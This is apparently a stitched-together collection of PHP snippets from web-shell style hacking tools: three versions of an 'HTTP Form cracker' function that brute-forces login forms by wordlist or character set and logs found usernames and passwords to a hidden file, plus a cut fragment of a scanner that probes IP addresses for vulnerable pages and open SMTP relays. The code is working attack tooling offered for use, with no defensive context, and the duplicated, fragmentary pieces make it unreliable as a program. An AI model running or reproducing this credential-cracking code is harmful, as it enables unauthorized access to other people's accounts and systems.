function formcrackeR() { global $errorbox, $footer, $et, $hcwd; if (!empty($_REQUEST['start'])) { if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) { $log = 1; $file = $_REQUEST['logfilE']; } else { $log = 0; } $url = $_REQUEST['target']; $uf = $_REQUEST['userf']; $pf = $_REQUEST['passf']; $sf = $_REQUEST['submitf']; $sv = $_REQUEST['submitv']; $method = $_REQUEST['method']; $fail = $_REQUEST['fail']; $dic = $_REQUEST['dictionary']; $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ''; if (!file_exists($dic)) { die("{$errorbox} Can not open dictionary.{$et}{$footer}"); } $dictionary = fopen($dic, 'r'); echo '<font color=blue>Cracking started...<br>'; while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}"; $res = check_urL($url, $method, $fail, 12); if (!$res) { echo "<font color=blue>U: {$user} P: {$pass}</font><br>"; if ($log) { file_add_contentS($file, "U: {$user} P: {$pass}\r\n"); } if (!$type) { break; } } } fclose($dictionary); echo 'Done!</font><br>'; } else { echo "<center><table border=0 style='border-collapse: collapse' width='434'><tr><td width='174' bgcolor='#333333'>HTTP Form cracker:</td><td bgcolor='#333333' width='253'></td></tr><form method='POST' name=form><tr><td width='174' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width='253'><input type=text name=dictionary size=35></td></tr><tr><td width='174' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='174' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user>{$hcwd}</td></tr><tr><td width='174' bgcolor='#808080'>Action Page:</td><td bgcolor='#808080' width='253'><input type=text name=target value='http://" . getenv('HTTP_HOST') . "/login.php' size=35></td></tr><tr><td width='174' bgcolor='#666666'>Method:</td><td bgcolor='#666666' width='253'><select size='1' name='method'><option selected value='POST'>POST</option><option value='GET'>GET</option></select></td></tr><tr><td width='174' bgcolor='#808080'>Username field name:</td><td bgcolor='#808080' width='253'><input type=text name=userf value=user size=35></td></tr><tr><td width='174' bgcolor='#666666'>Password field name:</td><td bgcolor='#666666' width='253'><input type=text name=passf value=passwd size=35></td></tr><tr><td width='174' bgcolor='#808080'>Submit name:</td><td bgcolor='#808080' width='253'><input type=text value=login name=submitf size=35></td></tr><tr><td width='174' bgcolor='#666666'>Submit value:</td><td bgcolor='#666666' width='253'><input type=text value='Login' name=submitv size=35></td></tr><tr><td width='174' bgcolor='#808080'>Fail string:</td><td bgcolor='#808080' width='253'><input type=text name=fail value='Try again' size=35></td></tr><tr><td width='174' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> <input class=buttons type=submit name=start value=Start></form>{$et}</center>"; } }
function formcrackeR() { global $hcwd; if (!empty($_REQUEST['start'])) { if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) { $log = 1; $file = $_REQUEST['logfilE']; } else { $log = 0; } $uf = $_REQUEST['userf']; $pf = $_REQUEST['passf']; $sf = $_REQUEST['submitf']; $sv = $_REQUEST['submitv']; $method = $_REQUEST['method']; $fail = $_REQUEST['fail']; if (!empty($_REQUEST['dictionary'])) { $dic = $_REQUEST['dictionary']; } $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ''; if ($_REQUEST['mode'] == 'wl') { $dictionary = fopen($dic, 'r'); if ($dictionary) { echo '<font color=#FA0>Cracking...<br>'; while (!feof($dictionary)) { $url = $_REQUEST['target']; if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}"; $res = check_urL($url, $method, $fail, 12); if (!$res) { echo "<font color=#FA0>U: {$user} P: {$pass}</font><br>"; if ($log) { file_add_contentS($file, "U: {$user} P: {$pass}\r\n"); } if (!$type) { break; } } } fclose($dictionary); } else { echo "Can not open dictionary."; } } else { $code = '$test=!check_urL("' . $_REQUEST['target'] . '?' . $uf . '=' . $user . '&' . $pf . '=$word&' . $sf . '=' . $sv . '","' . $method . '","' . $fail . '",12);'; @flush_buffers(); if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code)) { echo "<b>{$user}:{$res}</b><br />"; if ($log) { file_add_contentS($file, "U: {$user} P: {$res}\r\n"); } } } echo 'Done!</font><br>'; } else { echo '<form name=cracker method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">HTTP Form cracker</label> </div> <div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield"> <select name="mode" id="mode" onChange="toggle()"> <option value="09">Bruteforce [0-9]</option> <option value="az">Bruteforce [a-z]</option> <option value="az09">Bruteforce [a-z] [0-9]</option> <option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option> <option value="all">Bruteforce [ALL]</option> <option value="wl">Wordlist</option> </select> </div></div> <div class="fieldwrapper" id="dic"> <label class="styled">Dictionary:</label> <div class="thefield"> <input type="text" name="dictionary" size="30" /> </div> </div> <div class="fieldwrapper" id="fcr"> <label class="styled">Dictionary type:</label> <div class="thefield"> <ul style="margin-top:0;"> <li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li> <li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li> </ul> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="user" value="admin" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Action:</label> <div class="thefield"> <input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/login.php" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Method:</label> <div class="thefield"> <select name="method"><option selected value="POST">POST</option><option value="GET">GET</option></select> </div> </div><div class="fieldwrapper"> <label class="styled">Username field:</label> <div class="thefield"> <input type="text" name="userf" value="username" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Password field:</label> <div class="thefield"> <input type="text" name="passf" value="passwd" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Submit name:</label> <div class="thefield"> <input type="text" name="submitf" value="submit" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Submit value:</label> <div class="thefield"> <input type="text" name="submitv" value="Login" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Fail string:</label> <div class="thefield"> <input type="text" name="fail" value="Try again" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label> <div class="thefield"> <input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log"> </div> </div> ' . $hcwd . ' <div class="buttonsdiv"> <input type="submit" name="start" value="Start" style="margin-left: 150px;" /> </div> </form><script type="text/JavaScript"> toggle(); </script>'; } }
flusheR(); } } elseif (strstr($page, '@NUKE')) { foreach ($nuke as $cg) { $nukech = str_replace('@NUKE', $cg, $page); $url = "http://{$ip}{$nukech}"; $res = check_urL($url, $vuln[3], $vuln[2], $timeout); if ($res) { $output = 1; echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>"; } flusheR(); } } else { $url = "http://{$ip}{$page}"; $res = check_urL($url, $vuln[3], $vuln[2], $timeout); if ($res) { $output = 1; echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>"; } flusheR(); } } } } if (!empty($_REQUEST['smtprelay'])) { if (checkthisporT($ip, 25, $timeout)) { $res = ''; $res = checksmtP($ip, $timeout); if ($res == 1) { echo "{$ip}) SMTP relay found.<br>";
function formcrackeR() { global $errorbox, $footer, $et, $hcwd; if (!empty($_REQUEST['start'])) { $url = $_REQUEST['target']; $uf = $_REQUEST['userf']; $pf = $_REQUEST['passf']; $sf = $_REQUEST['submitf']; $sv = $_REQUEST['submitv']; $method = $_REQUEST['method']; $fail = $_REQUEST['fail']; $dic = $_REQUEST['dictionary']; $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ""; if (!file_exists($dic)) { die("{$errorbox} Can not open dictionary.{$et}{$footer}"); } $dictionary = fopen($dic, 'r'); echo "<font color=blue>Cracking started...<br>"; while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $url .= "?{$uf}={$user}&{$pf}={$pass}&{$sf}={$sv}"; $res = check_urL($url, $method, $fail, 12); if (!$res) { echo "<font color=blue>U: {$user} P: {$pass}</font><br>"; flusheR(); if (!$type) { break; } } flusheR(); } fclose($dictionary); echo "Done!</font><br>"; } else { echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>{$hcwd}</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://" . getenv('HTTP_HOST') . "/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>"; } }